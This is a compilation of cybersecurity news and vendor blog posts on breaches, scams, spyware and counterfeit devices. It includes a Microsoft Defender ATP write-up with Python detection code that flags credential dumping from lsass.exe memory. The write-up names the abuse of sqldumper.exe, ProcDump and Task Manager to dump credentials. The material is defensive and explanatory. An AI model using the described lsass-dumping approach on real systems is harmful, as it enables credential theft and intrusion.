This is a sharp contrast to 2017, when millions of computers worldwide were heavily infected by ransomware, most notably WannaCry and NotPetya. Cryptojacking is easy to deploy and very difficult to detect, as it is basically a program that consumes CPU/GPU resources like any other program on a computing device. But the consumed CPU/GPU resources do not produce a tangible output like a typical benign program; instead they are spent computing cryptographic hashes in an attempt to mine cryptocurrency.

“While we have seen a welcome drop in ransomware and malware attacks, it would be a mistake to assume the level of the cyber threat to Irish organizations has also decreased. We are seeing major behavioral change amongst criminal hackers, who want access to a victim’s computer and an organization’s network to access data, but also use their computing power to mine for cryptocurrency. This is about playing the long game and exploiting people’s lack of training and understanding when it comes to cybercrime. Microsoft’s analysts predict phishing will continue to be an issue for the foreseeable future for that reason,” explained Des Ryan, Microsoft Ireland’s Solutions Director.

To add insult to injury, Microsoft underscored that many private and public entities in the country lack adequate staff training when it comes to cybersecurity. The vulnerable companies also practice lax IT security protocols, a trait that allows a small mistake to escalate rapidly.

The post Ireland And Its Evolving Cybersecurity Issues appeared first on .

Security Affairs newsletter Round 214 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

https://www.surveymonkey.com/r/EUBloggerAwards2018

Hacking the ‘Unhackable’ eyeDisk USB stick
Security breach suffered by credit bureau Equifax has cost $1.4 Billion
Turkish Personal Data Protection Authority fined Facebook for Photo API bug
CVE-2019-11815 Remote Code Execution affects Linux Kernel prior to 5.0.8
Expert discovered how to brick all Samsung mobile phones
Facebook sues data analytics firm Rankwave over alleged data misuse
Over 10k+ GPS trackers could be abused to spy on individuals in the UK
Pacha Group declares war on rival crypto mining hacking groups
Reading the Yoroi Cyber Security Annual Report 2018
Malware Training Sets: FollowUP
Millions of computers powered by Intel chips are affected by MDS flaws
North Korea-linked ScarCruft APT adds Bluetooth Harvester to its arsenal
Thrangrycat flaw could allow compromising millions of Cisco devices
Unprotected DB exposed PII belonging to nearly 90% of Panama citizens
WhatsApp zero-day exploited in targeted attacks to deliver NSO spyware
Adobe patches over 80 flaws in Flash, Acrobat Reader, and Media Encoder
Microsoft Patch Tuesday addresses dangerous RDS flaw that opens to WannaCry-like attacks
SAP Security Patch Day for May 2019 fixes many missing authorization checks
Twitter inadvertently collected and shared iOS location data
A flaw in Google Titan Security Keys exposes users to Bluetooth attacks
A joint operation by international police dismantled GozNym gang
BlackTech espionage group exploited ASUS update process to deliver Plead Backdoor
Google ‘0Day In the Wild’ project tracks zero-days exploited in the wild
Magecart hackers inject card Skimmer in Forbes Subscription Site
Microsoft renewed its Attack Surface Analyzer, version 2.0 is online
Past, present, and future of the Dark Web
The stealthy email stealer in the TA505 hacker group’s arsenal
A flaw in Slack could allow hackers to steal, manipulate downloaded files
Chinese state-sponsored hackers breached TeamViewer in 2016
Cisco addressed a critical flaw in networks management tool Prime Infrastructure
Stack Overflow Q&A platform announced a data breach
XSS flaw in WordPress Live Chat Plugin lets attackers compromise WP sites
Dozens of Linksys router models leak data useful for hackers
Facebook banned Archimedes Group, misinformation made in Israel
Number of hacktivist attacks declined by 95 percent since 2015
Unistellar attackers already wiped over 12,000 MongoDB databases

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 214 – News of the week appeared first on Security Affairs.

How can we give cybersecurity analysts a helping hand?

It’s tough being a cybersecurity analyst these days. Over the last few years we have been repeatedly reminded of the challenge they are now facing, primarily through the steady stream of high-profile data breaches that have hit the headlines. In the last month alone Microsoft has been in the news after suffering a breach that enabled hackers to access customer email accounts, while a breach at beleaguered social giant Facebook was believed to have left … More

The post How can we give cybersecurity analysts a helping hand? appeared first on Help Net Security.

The largest breaches over the past three years have caused massive and irreparable damage

Publicly traded companies suffering the worst data breaches averaged a 7.5 percent decrease in stock price, a Bitglass report reveals. Bitglass researched the three largest data breaches of publicly traded companies from each of the last three years in order to uncover cybersecurity trends and demonstrate the extensive damage that can be done by improper security. Among the incidents detailed in the Kings of the Monster Breaches report are the Marriott breach of 2018, the … More

The post The largest breaches over the past three years have caused massive and irreparable damage appeared first on Help Net Security.

Analysis of device data shines a light on cybersecurity risks in healthcare

The convergence of IT, IoT and OT makes it more difficult for the healthcare industry to manage a wide array of hard-to-control network security risks. IoT and OT devices are rapidly increasing in numbers, but traditional IT still represents the most vulnerable attack surface, according to the Forescout Technologies report. Forescout Technologies announced insights from 75 real healthcare deployments with more than 10,000 virtual local area networks (VLANs) and 1.5 million devices contained within the … More

The post Analysis of device data shines a light on cybersecurity risks in healthcare appeared first on Help Net Security.

Identity theft victims could lead us to accept more security-improving friction

Far too many individuals who have never been victims of identity theft and financial crimes don’t understand how devastating those are to victims. “There are many victim services organizations that assist violent crime victims and the understanding of the trauma and the victim experience is not questioned (which is very appropriate and as it should be),” Eva Velasquez, president and CEO of the Identity Theft Resource Center (ITRC), told Help Net Security. After all, we … More

The post Identity theft victims could lead us to accept more security-improving friction appeared first on Help Net Security.

CISOs: What would you do over?

Just after the new year I was catching up with a CISO over lunch in Pike Place Market in Seattle. We were reminiscing about how tough it is to get a security program up and running in the beginning. Pausing to dip his taco in the excellent house salsa, he commented, “Y’know, if I had to do it all over again…” and he proceeded to tell me a story. My brain twitched with possibilities—here was … More

The post CISOs: What would you do over? appeared first on Help Net Security.

The six biggest cybersecurity risks facing the utilities industry

The utilities industry is rapidly modernizing its infrastructure, adding more digitized equipment and connectivity across devices, plants, and systems. This evolution to “smart infrastructure” represents a positive, paradigm shift for the industry. Unfortunately, the security policies of many utilities have not evolved along with it, leaving them incredibly vulnerable. Utilities are investing heavily to modernize infrastructure. In fact, ABI Research projects that the industry will spend US$14 billion a year between 2018 and 2023 — … More

The post The six biggest cybersecurity risks facing the utilities industry appeared first on Help Net Security.

The Latest Techniques Hackers are Using to Compromise Office 365

It was only a few years back that cloud technology was in its infancy and used only by tech-savvy, forward-thinking organisations. Today, it is commonplace. More businesses than ever are making use of cloud services in one form or another. And recent statistics suggest that cloud adoption has reached 88 percent. It seems that businesses now […]… Read More

The post The Latest Techniques Hackers are Using to Compromise Office 365 appeared first on The State of Security.

3 Tips for Protecting Against the New WhatsApp Bug

Messaging apps are a common form of digital communication these days, with Facebook’s WhatsApp being one of the most popular options out there. The communication platform boasts over 1.5 billion users – who now need to immediately update the app due to a new security threat. In fact, WhatsApp just announced a recently discovered security vulnerability that exposes both iOS and Android devices to malicious spyware.

So, how does this cyberthreat work, exactly? Leveraging the new WhatsApp bug, cybercriminals first begin the scheme by calling an innocent user via the app. Regardless of whether the user picks up or not, the attacker can use that phone call to infect the device with malicious spyware. From there, crooks can snoop around the user’s device, likely without the victim’s knowledge.

Fortunately, WhatsApp has already issued a patch that solves for the problem – which means users will fix the bug if they update their app immediately. But that doesn’t mean users shouldn’t still keep security top of mind now and in the future when it comes to messaging apps and the crucial data they contain. With that said, here are a few security steps to follow:

  • Flip on automatic updates. No matter the type of application or platform, it’s always crucial to keep your software up-to-date, as fixes for vulnerabilities are usually included in each new version. Turning on automatic updates will ensure that you are always equipped with the latest security patches.
  • Be selective about what information you share. When chatting with fellow users on WhatsApp and other messaging platforms, it’s important you’re always careful of sharing personal data. Never exchange financial information or crucial personal details over the app, as they can possibly be stolen in the chance your device does become compromised with spyware or other malware.
  • Protect your mobile phones from spyware. To help prevent your device from becoming compromised by malicious software, such as this WhatsApp spyware, be sure to add an extra layer of security to it by leveraging a mobile security solution. With McAfee Mobile Security being available for both iOS and Android, devices of all types will remain protected from cyberthreats.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post 3 Tips for Protecting Against the New WhatsApp Bug appeared first on McAfee Blogs.

Feds Break Up Major SIM-Hijacking Ring

The U.S. Department of Justice announced that it has arrested and charged members of a major cybercriminal ring in connection with $2.4 million worth of wire fraud and identity theft.

The hacking group, called “The Community,” primarily used social engineering (trickery) and SIM card hijacking to steal funds and cryptocurrency from their victims.

SIM swapping or hijacking is an attack that often uses personal information gleaned from other sources (such as social engineering) to authenticate a fraudster to a mobile phone company. Once authenticated, the mobile phone number of the target victim is moved to the criminal’s phone. Possession of the target’s phone number allows the criminal to receive calls and texts intended for the target, making it possible to bypass his or her two-factor authentication and thus gain access to the victim’s financial accounts.

Members of The Community face charges of wire fraud and aggravated identity theft. Three former mobile provider employees are also charged with accepting bribes to facilitate SIM-card hijacks for the group.

Read more about the story here.

The post Feds Break Up Major SIM-Hijacking Ring appeared first on Adam Levin.

What does it take to be an infosec product strategist?

Choosing a security product that will best fit your organization’s needs is a challenge exacerbated by the “polluted, turbulent sea of ineffectual security products” that you’ll need to wade through in order to find the right and effective solution. “I tend to maintain an overwhelming sense that the majority of security products exist ‘just because’ – ‘just because’ the underlying technology seemed cool to build, ‘just because’ it is what has always been used despite … More

The post What does it take to be an infosec product strategist? appeared first on Help Net Security.

Security spring cleaning: 5 tips for tidying up network safeguards

Networks need regular cleaning just like your home, car or garage. Why? The answer is simple – poor security hygiene can lead to major data breaches. If you don’t regularly review your network, potential weaknesses and vulnerabilities will stack up. As we enter into spring cleaning season, now is as good a time as any for IT administrators and security professionals to catch up on yearly security maintenance. Here are several tasks that should be … More

The post Security spring cleaning: 5 tips for tidying up network safeguards appeared first on Help Net Security.

Cybersecurity, privacy and technologies still top challenges for IT audit teams and leaders

Cybersecurity, privacy and technologies—from mission-critical to digitally transformative—top the list of challenges IT audit teams and leaders grapple with every day, according to a study conducted by ISACA and Protiviti. An executive summary of the study notes the growing role and responsibilities of IT audit in digital transformation, partnerships between the IT organization and IT audit function, and differences in how IT audit leaders operate compared to other IT audit professionals. The 2019 IT Audit … More

The post Cybersecurity, privacy and technologies still top challenges for IT audit teams and leaders appeared first on Help Net Security.

Employees are aware of USB drive security risks, but don’t follow best practices

Employees are aware of the risks associated with inadequate USB drive security – yet their employers aren’t mandating following best practices, according to a report by Apricorn. “The State of USB Data Protection 2019: Employee Spotlight” survey report, which polled nearly 300 employees across industries including education, finance, government, healthcare, legal, retail, manufacturing, and power and energy, examined year-over-year trends of USB drive usage, policies and business drivers. The report reveals that while employees have … More

The post Employees are aware of USB drive security risks, but don’t follow best practices appeared first on Help Net Security.

The iOS Twitter Bug: 3 Tips to Protect Your Location Data

Many of us use social media to keep our family and friends up-to-date on our everyday lives. We don’t typically expect social media companies to keep their partners updated on our every move as well. But for some Twitter users, this is exactly the situation they’ve found themselves in. On Monday afternoon, the social media company disclosed a bug that resulted in some Twitter users’ locations being shared with an unnamed Twitter partner.

So, how exactly did this bug disclose the locations of certain Twitter users? The social network accidentally sent advertising partners location data for a process called real-time bidding. This process lets advertisers pay for space based on certain users’ locations. Twitter intended to remove the location data from what it sent to its partners but failed to do so. Affected users include those who had more than one Twitter account on an iOS device. If the user chose to share their precise location on one account, Twitter says it may have collected and shared data for the other account on the same mobile device even if that account had opted out of location sharing. Although the location data was “fuzzed” to only show a ZIP code or city, it is still unclear as to how long this location sharing took place.

According to Twitter, the location data was not retained by the partner and they have fixed the problem to ensure that it doesn’t happen again. And while affected users have already been notified by the social network, there are some steps users can take to help protect their data:

  • Turn off location services. While social media is meant for sharing, there is some information, like your location, that ought to be kept private. If a cybercriminal knows where you are at a specific point in time, they could potentially use that information to your disadvantage. Consider your overall privacy and opt out of sharing your location data with social media platforms.
  • Update, update, update. No matter what type of bug might be affecting a certain platform, it’s always crucial to keep your software up-to-date. Turning on automatic updates will ensure that you are always equipped with the latest patches and security fixes.
  • Use a comprehensive security solution. Using a solution like McAfee Total Protection helps to add an extra layer of security in case a bug does expose your device or data.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The iOS Twitter Bug: 3 Tips to Protect Your Location Data appeared first on McAfee Blogs.

Chinese National Indicted For Anthem’s 2015 Massive Data Breach

The U.S. Department of Justice’s prosecutors found probable cause to charge 32-year-old Fujie Wang, a Chinese national, as allegedly responsible for the data breach at Anthem, a health insurance firm, four years ago in 2015. The incident resulted in Anthem losing control of at least 78.8 million records. Accused of being a member of a Chinese hacking syndicate, Wang now faces four charges:

  • Intentional damage to a Protected Computer
  • Conspiracy to Commit Wire Fraud
  • Conspiracy to Commit Fraud
  • And other Related Activity in Connection with Computers

Anthem confirmed in 2015 that the information of 78.8 million of its customers had been stolen, including full names, birth dates, addresses, employment information and the corresponding income data, medical information and Social Security numbers. Aside from Wang, the other suspects, still at large at the time of writing, used the online aliases Zhou Zhihong, Kim Young and Deniel Jack.

Before Wang was arrested, the Federal Bureau of Investigation posted a wanted notice to inform the public that the authorities were looking for him:

Federal Bureau of Investigation

“The allegations in the indictment unsealed today outline the activities of a brazen China-based computer hacking group that committed one of the worst data breaches in history. These defendants allegedly attacked U.S. businesses operating in four distinct industry sectors, and violated the privacy of over 78 million people by stealing their personally identifiable information,” explained Brian Benczkowski, U.S. Assistant Attorney General.

Unlike a typical breach, where an attacker takes the information stored in the target company’s website, cloud storage or server in a single, large event, Wang’s team was very deliberate with the infiltration, using stealthy techniques. The DOJ’s decision to indict coincides with the current trade negotiations between China and the United States, which aim to ease, if not end, the trade war between the world’s two largest economies.

Aside from Anthem, Wang is also facing charges for infiltrating three more businesses, which the DOJ has refused to name but hinted were from the communication, technology and basic industrial material sectors respectively. Anthem was also lax when it came to training its employees on cybersecurity topics such as anti-phishing techniques, which would have minimized the chance of them falling for online frauds and scams. The primary suspicion as to how Anthem’s system was infiltrated is that an employee with privileged access to the system opened a malicious email; through clever social engineering, the contents of the email convinced the user to open a phishing link or an attachment containing a malware dropper.

October 20, 2018, hackercombat.com broke the story about Anthem’s decision to pay their affected stakeholders $16 million as settlement for their data breach episode. It was labeled as the “biggest sum gathered by the government in a healthcare data breach”. This was the result of Anthem’s verification of their own systems, and most of the amount will be paid for the credit monitoring and identity theft protection of all its affected customers.

Source: https://threatpost.com/chinese-hackers-anthem-data-breach-indicted/144572/

The post Chinese National Indicted For Anthem’s 2015 Massive Data Breach appeared first on .

Detecting credential theft through memory access modelling with Microsoft Defender ATP

Stealing user credentials is a key step for attackers to move laterally across victim networks. In today’s attacks, we see a range of tools used to achieve credential theft, requiring protections that target the root behavior and not just individual known tools as is often done by traditional antimalware software.

Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP), Microsoft’s unified endpoint protection platform, uses multiple approaches to detect credential dumping. In this post, we’ll discuss one of them: a statistical approach that models memory access to the Local Security Authority Subsystem Service (lsass.exe) process.

The lsass.exe process manages many user credential secrets; a key behavior associated with credential theft, and therefore common across many tools used by attackers, is to read large amounts of data from this process’ memory space.

Microsoft Defender ATP instruments memory-related function calls such as VirtualAlloc and VirtualProtect to catch in-memory attack techniques like reflective DLL loading. The same signals can also be used to generically detect malicious credential dumping activities performed by a wide range of different individual tools.

A statistical approach to detecting credential theft

Reviewing the behavior of multiple known tools, we see that the number and size of memory reads from the lsass.exe process related to credential dumping are highly predictable. The diagram below shows a (slightly simplified) view of this.

[Figure 1: number of read operations vs. number of bytes read]

By contrast, legitimate reads from the lsass.exe process, such as routine handling of users signing in, fall outside this cluster.
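To make the read-count versus bytes-read model concrete, here is an added Python example (not Microsoft's code) that fits a small centroid-plus-radius cluster from constructed profiles of known dumping tools and then scores constructed cross-process read telemetry against it. The event schema, the tool profiles, the per-read sizes and the radius scaling are all assumptions made for the example.

```python
import math
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

LSASS = "lsass.exe"


@dataclass(frozen=True)
class MemoryRead:
    """One cross-process memory read as an endpoint sensor might record it (constructed schema)."""
    pid: int
    image: str          # process performing the read
    target_image: str   # process whose memory was read
    bytes_read: int


def aggregate_lsass_reads(events: Iterable[MemoryRead]) -> Dict[Tuple[int, str], Tuple[int, int]]:
    """Per reading process: (number of reads, total bytes) taken from lsass.exe memory."""
    totals: Dict[Tuple[int, str], List[int]] = defaultdict(lambda: [0, 0])
    for ev in events:
        if ev.target_image.lower() != LSASS:
            continue  # reads of other processes are not part of this model
        acc = totals[(ev.pid, ev.image.lower())]
        acc[0] += 1
        acc[1] += ev.bytes_read
    return {key: (acc[0], acc[1]) for key, acc in totals.items()}


def features(read_count: int, total_bytes: int) -> Tuple[float, float]:
    """Log-scale both measurements so the dumping cluster is compact across orders of magnitude."""
    return (math.log10(read_count), math.log10(total_bytes))


class LsassReadModel:
    """Centroid-plus-radius model of the 'credential dumping' cluster in (reads, bytes) space.

    Fitted from (read_count, total_bytes) profiles of known dumping tools; a process whose
    aggregate lands within `radius` of the centroid (in log space) matches the cluster.
    """

    def __init__(self, known_profiles: List[Tuple[int, int]], radius_scale: float = 1.5) -> None:
        points = [features(c, b) for c, b in known_profiles]
        n = len(points)
        self.centroid = (sum(p[0] for p in points) / n, sum(p[1] for p in points) / n)
        spread = max(math.dist(p, self.centroid) for p in points)
        # Assumed slack so unseen tools in the same region still match.
        self.radius = spread * radius_scale

    def distance(self, read_count: int, total_bytes: int) -> float:
        return math.dist(features(read_count, total_bytes), self.centroid)

    def matches_cluster(self, read_count: int, total_bytes: int) -> bool:
        return self.distance(read_count, total_bytes) <= self.radius


def detect_credential_dumping(events: Iterable[MemoryRead], model: LsassReadModel) -> List[Tuple[int, str]]:
    """Return the (pid, image) pairs whose lsass.exe reads fall inside the dumping cluster."""
    flagged = []
    for (pid, image), (count, total) in aggregate_lsass_reads(events).items():
        if model.matches_cluster(count, total):
            flagged.append((pid, image))
    return flagged


# Constructed training profiles: (reads, total bytes) attributed to known dumping tools.
KNOWN_DUMPING_PROFILES = [(1200, 60_000_000), (900, 45_000_000), (1500, 80_000_000), (1100, 55_000_000)]


def sample_events() -> List[MemoryRead]:
    """Constructed telemetry: routine sign-in reads, an abused admin tool, and an unrelated read."""
    events: List[MemoryRead] = []
    # Routine sign-in handling: a handful of small reads from lsass.exe.
    events.extend(MemoryRead(612, "winlogon.exe", LSASS, 4096) for _ in range(6))
    # sqldumper.exe repurposed to dump lsass.exe: 1300 reads of ~54 KB each (~70 MB in total).
    events.extend(MemoryRead(4321, "sqldumper.exe", LSASS, 53_846) for _ in range(1300))
    # A large read of a different process; ignored by the lsass.exe model.
    events.append(MemoryRead(777, "svchost.exe", "explorer.exe", 1_000_000))
    return events


if __name__ == "__main__":
    model = LsassReadModel(KNOWN_DUMPING_PROFILES)
    for key, (count, total) in aggregate_lsass_reads(sample_events()).items():
        print(key, count, total, "dumping-cluster" if model.matches_cluster(count, total) else "expected")
    print("flagged:", detect_credential_dumping(sample_events(), model))
```

A single-read full dump (ProcDump-style) would land far from this particular cluster, so a production model needs profiles for each read pattern it is meant to catch, not just the many-small-reads one modelled here.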

Microsoft Defender ATP uses such a model to discriminate between expected and unexpected accesses to lsass.exe process memory, and raise an alert in the latter case:

[Figure 2: "Sensitive credential memory read" alert]

Microsoft Defender ATP’s process tree view of the alert identifies the tool performing the suspicious credential access activity, in this example, sqldumper.exe. This is a legitimate administrator tool found on many database servers, but attackers have been known to abuse it to dump credentials to avoid the risk of downloading custom tooling that may be flagged by antimalware solutions.

[Figure 3: alert process tree]

Similarly, Microsoft Defender ATP detects attacker abuse of otherwise legitimate administrator tooling, such as the Microsoft Sysinternals tool ProcDump or Task Manager, when these are repurposed to dump lsass.exe process memory. Attackers take this approach, sometimes referred to as living-off-the-land, to avoid tools that they know are commonly detected as malicious. In the memory-dumping scenario described here, they may even exfiltrate the memory dump and perform the credential extraction offline rather than on the victim machine.

Over time we have also seen Microsoft Defender ATP identify several distinct custom tools using this memory modelling technique. A couple of open-source examples are shown here.

[Figure 4: sample open-source tools detected by the memory model]

Foiling cyberattacks by stopping credential theft

In this blog post we illustrated one of several ways in which Microsoft Defender ATP detects credential theft. Security operations (SecOps) teams can use the alerts in Microsoft Defender ATP to quickly identify and respond to attacks: stopping credential dumping techniques empowers SecOps to resolve cyberattacks before the latter stages, such as lateral movement, command-and-control, and exfiltration.

Microsoft Defender ATP uses rich security data, advanced behavioral analytics, and machine learning to detect attacks. Enhanced instrumentation and detection capabilities in Microsoft Defender ATP can better expose covert, sophisticated attacker techniques like credential theft and other in-memory attacks. Microsoft Defender ATP demonstrated its strength in detecting credential dumping and other high-impact attacker techniques in MITRE’s evaluation of EDR solutions.

Microsoft Defender ATP contributes to and benefits from security signals shared across Microsoft’s security solutions through Microsoft Threat Protection, which provides seamless, integrated, and comprehensive security across multiple attack vectors. The enriched security data drives stronger protection and the orchestration of threat remediation across identities, endpoints, email and data, apps, and infrastructure.

To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, sign up for a free trial.

To learn more about Microsoft Threat Protection, read our monthly updates on the evolution of this comprehensive security solution.

Rob Mead and Tim Burrell
Microsoft Threat Intelligence Center

Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft Defender ATP community.

Follow us on Twitter @MsftSecIntel.

The post Detecting credential theft through memory access modelling with Microsoft Defender ATP appeared first on Microsoft Security.

5 Cyber Security Best Practices For Your Small to Medium-Size Business

Small to medium-sized businesses often tend to underestimate cybersecurity. The reasons range from practicality – they may not have the resources – to sheer over-confidence – the notion that they are not important enough to be at risk of cybersecurity threats. Nothing could be further from the truth.

A survey by the United Kingdom government and KPMG among 1,000 small businesses in the country threw up worrisome statistics: only 23% of small businesses felt cyber security was a top security concern, while 29% of businesses who had not experienced a breach felt they would suffer reputational damage. Another worrying statistic comes from a different report: at least 61 percent of the hacked industries and enterprises functioned with a smaller workforce, i.e. fewer than 1,000 employees.

Even if a business is small or medium-sized, it does not mean it is not at risk of cybersecurity threats. In fact, it may well be the opposite – they are sitting ducks, as cyber criminals are aware that SMEs may not be as concerned about their security as bigger businesses. The consequences may also be more severe – even a minor data breach could leave an SME crippled and unable to recover.

It’s clear then that SMEs must be extremely serious when it comes to cybersecurity. Here are some of the best practices they must follow:

Invest in Training – Since most cybersecurity risks primarily originate due to user negligence, it is important to train and educate employees about cybersecurity. Employees should know what to do in case of security alerts and they should also understand to be cautious about what links they click on, what information they share and what USB devices they plug in their machines.

Have an MDM plan – With almost all employees owning a plethora of gadgets and smartphones, it is crucial for SMEs to regulate the usage of these devices. A lot of sensitive information and email can be accessed on these devices, and they also hold access to the company’s wireless networks. So monitoring and regulating such mobile devices is essential.

Backup Data – When it comes to data backup, we recommend following the 3-2-1 rule. As per this, SMEs should maintain 3 different copies of all their sensitive data, over 2 different formats and locations and at least 1 of these locations should be offline. Following this rule will ensure that all confidential company information remains in the hands of the organization itself.

Data Encryption – Simply saving and storing data is not enough anymore, as it can be breached and accessed at any time. It is always advisable to encrypt data when it is saved and backed up. Access to this data should only be granted to specific people and such security measures help enterprises maintain the integrity of their critical data in the long term.

Use a Security Solution – When it comes to effective enterprise security solutions, there is no dearth of options available in the market. It is important to choose a solution that meets the exact requirements of the organization, and does exactly what it promises to do. Extra features and customizations can always be added later, so the SME should know its precise needs before choosing a solution.

The post 5 Cyber Security Best Practices For Your Small to Medium-Size Business appeared first on Seqrite Blog.

Avoid a Security Endgame: Learn About the Latest “Avengers” Scam

Marvel Studios’ $2.2 billion box-office hit “Avengers: Endgame” has quickly risen to the second-highest grossing film of all time in its first two weekends. Not surprisingly, cybercriminals have wasted no time in capitalizing on the movie’s success by luring victims with free digital downloads of the film. How? By tempting users with security shortcuts so they can watch the film without worrying about spoilers or sold-out movie tickets.

When a victim goes to download the movie from one of the many scam sites popping up around the web, the streaming appears to begin automatically. What the user doesn’t know is that the footage being streamed is just from the movie’s trailer. Soon after, a message pops up stating that the user needs to create an account to continue with the download. The “free” account prompts the user to create a username and password in advance, which could potentially be useful for cybercriminals due to the common practice of password reuse. Once a victim creates an account, they are asked for billing information and credit card details in order to “verify location” and make sure the service is “licensed to distribute” the movie in the victim’s region. These crooks are then able to scrape the victim’s personal and financial data, potentially leading to online account hacks, stolen funds, identity theft, and more.

Luckily, Marvel fans can protect their online data to avoid a cybersecurity endgame by using the following tips:

  • Look out for potential scam activity. If it seems too good to be true, then it probably is. Be wary of websites promising free movie downloads, especially for movies that are still in theaters.
  • Shield your financial data. Be suspicious of “free downloads” that still require you to fill out billing information. If an unknown website asks for your credit card information or your bank account data, it’s best to avoid the site altogether.
  • Make sure your credentials are unique. With this scam, threat actors could use the login credentials provided by the victim to access their other accounts if they didn’t have a unique login. Avoiding username and password reuse makes it a lot harder for cybercriminals to hack into your other online accounts if they gain access to one.
  • Assemble a team of comprehensive security tools. Using a tool like McAfee WebAdvisor can help you avoid dangerous websites and links and will warn you in the event that you do accidentally click on something malicious.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Avoid a Security Endgame: Learn About the Latest “Avengers” Scam appeared first on McAfee Blogs.

U.S. Energy Grid Experiences Possible Cyberattack

An apparent denial of service attack caused a disruption in a segment of the U.S. energy grid affecting Utah, Wyoming, and Southern California.

Little is currently known about the incident. It occurred on March 5th and disabled several security devices. An unnamed utility company reported the incident to the Department of Energy.

“There was a denial-of-service attack…and that basically led operators to not be able to see what was going on in the grid,” said journalist Blake Sobczak, who initially reported the story. “As long as nothing crazy happens, you should be fine, but it certainly constitutes a disruption and a reportable event here to the Department of Energy.”

While the potential cyberattack did not lead to any known outages or interruptions in service, and used a relatively unsophisticated method, it is noteworthy for being the first known incident to successfully target the nation’s energy infrastructure. Hackers targeting the U.S. energy grid have been theoretical up to this point, but security experts have long maintained that the infrastructure is poorly secured and that many utility companies are unprepared when it comes to cyber defense.

Fears of an attack on utilities have increased in the wake of Russian infiltration of U.S. critical infrastructure announced in 2018 by the Department of Homeland Security.

The post U.S. Energy Grid Experiences Possible Cyberattack appeared first on Adam Levin.

Cybersecurity Leaders Are Talking A Lot About Counterfeit Devices

Malice Vs Greed

Most discussion about security in the supply chain has focused on detecting tampering, or on preventing backdoors and other sneaky things from being inserted into components and software. There is another aspect emerging that will dwarf tampering: devices that are counterfeited for profit, indirectly causing security problems. Counterfeit devices are ones that either are by design not what you think you are buying, or are mislabeled intentionally to make an older or different model appear to be a more desirable one. Like money, whether the note is printed by the forger or a zero is added to the number on a legitimate note, neither is what you expected or paid for. The motivation is greed, but there is a significant impact on security.

Counterfeit Devices Already A Big Issue in Healthcare and Hurt Security

Last year we studied the security of the medical device market. There is a healthy and legitimate market for used medical devices, and, not surprisingly, newer devices command a higher price than older ones. The medical community wisely pushed for a universal barcode that forms a Unique Device Identifier (UDI), so devices can be inventoried, their ownership lineage known, and information about them collected (e.g. location). UDI should be a useful tool for security operations, such as patching: if the UDI tells me that this device is an XYZ version 2014 monitoring device, then I can make sure it is patched using the most recent accepted update for that version.

So here is where greed, safety and security collide. Unscrupulous resellers can have counterfeit UDIs applied, making older medical devices appear to be a newer vintage. Making that XYZ v2014 appear to be a more valuable v2018 can be big money, with obvious problems for product recalls and for buyers paying too much. But applying a v2018 patch to a v2014 device can have unintended consequences such as bricking the device, leaving vulnerabilities open, or causing the device to malfunction. Desktop operating systems are robust, with dialogues and checks that minimize and usually avoid the misapplication of patches and updates. Almost all IoT and a lot of medical devices lack that robustness: if you have ever flashed the firmware of a router or camera, you know it is generally a black-box process with little if any feedback, and nothing checks that the image matches the hardware it is being written to. Swapped UDIs are one part of the problem; the other part is outright counterfeit devices that may or may not run the same software.

This sounds kind of like a rare issue? Nuh uh. The World Health Organization estimates that about 8% of medical devices are counterfeit.

The Trends Making Counterfeiting A Bigger Temptation in Enterprise IT

Several forces are colliding to make this a concern. IoT growth is the big one. Devices are joining enterprise networks at a continually increasing rate, which means more new devices are being added, and more ‘dumb’ devices that are already on premises are becoming connected or ‘smart.’ Scale is an issue because the growth of IoT challenges traditional network inventory, SIEM, and patch management tools. Inventory and patch management are being strained, a lot slips through the cracks in most companies, and that aids the counterfeiters’ job.

The second change is increased reliance on the ‘smartness’ of IoT: the IT aspects of Things are becoming a core capability. For example, a pump’s wireless flow reporting is as valued as the pumping itself, and the electronic displays in cars are no longer only for entertainment but are now required for critical functions such as the speedometer and vehicle controls.

The third change is heterogeneity. There are more brands of products and a faster rate of change in networks. Most enterprises already run a multi-vendor network for their switches and routers. Opening up branch offices to local internet has meant more brands and models, and there are always more security appliances in the racks, especially in large enterprises. Supply chain change means less traditional procurement for enterprises and more complex component sourcing for IT appliances and devices.

Why Is This A Bigger Security Concern Now?

All this scale, smartness and complexity increases both the temptation to counterfeit and the security impact when it happens. Scale means that falsely satisfying demand with older devices can be profitable, but those devices may not operate correctly when patched, or cannot be patched at all. Smartness means that a counterfeit device which goes unpatched, or was designed less securely than the genuine article, now sits on a network path or controls a process, so the impact is greater than when devices barely interacted. Heterogeneity of components and of the supply chain means more opportunity to counterfeit, more difficulty detecting counterfeit components, and more links in the chain involving more people, each with the potential to tamper.

Network and Security Devices Are the Next Wave of Counterfeiting

Counterfeit IT and IoT components are bad enough, but there is an emerging, greater threat. There have been recent cases where counterfeit security and networking devices have been sold: the very things that are the best line of defense against counterfeit devices and their security impact are themselves being counterfeited. In the counterfeit currency analogy, this is the equivalent of counterfeiting the machines that scan currency to detect forgeries.

What Enterprises Need to Do

The best change that can be made is to make supply chain integrity include counterfeit detection. In other words, whereas most supply chain integrity work is about not losing links in the chain, making sure those links are valid needs to be re-emphasized or added. High-capability organizations are probably already doing this, but frankly it is rare. Changes in procurement can be a big part of it, including asking vendors what supply chain integrity steps they themselves take. It may mean that “lowest cost” has to be amended to “lowest cost authentic.”

Most vulnerability management includes an inventory step (find what we have) and patch management. Increasing validation of inventory results is a great first step. When the inventory is assumed, or derived from procurement records, it needs a validation step: if the inventory says we have 20 type X v2 routers, let’s make sure each one really is a type X and really is a v2, based on what the device itself reports rather than on its label.
